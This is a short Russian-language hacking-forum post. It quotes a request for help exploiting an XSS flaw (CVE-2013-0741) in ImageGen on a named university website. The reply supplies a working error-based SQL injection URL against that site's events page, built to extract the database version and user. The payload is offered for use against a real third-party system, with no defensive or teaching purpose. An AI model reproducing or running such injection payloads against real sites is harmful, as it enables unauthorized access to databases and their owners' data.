12.12.2013, 18:03
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от mgVolt
Всем привет.
Не подскажете, как эксплуатируется XSS в параметре font в Imagegen, CVE-2013-0741 (http://secunia.com/community/advisories/52771).
Например, здесь http://www.viu.ca/ImageGen.ashx?image=/homestay/galleria_photos/013.JPG&width=960
Там есть нечто большее:
Код:
http://www.viu.ca/events/event.aspx?id=9275%20or%28select%281%29from%28information_schema.schemata%29where%281=1%29group%20by%28concat%28version%28%29,0x3b,user%28%29,floor%28rand%280%29*2%29%29%20%29having%28min%280%29%29%29
|
|
|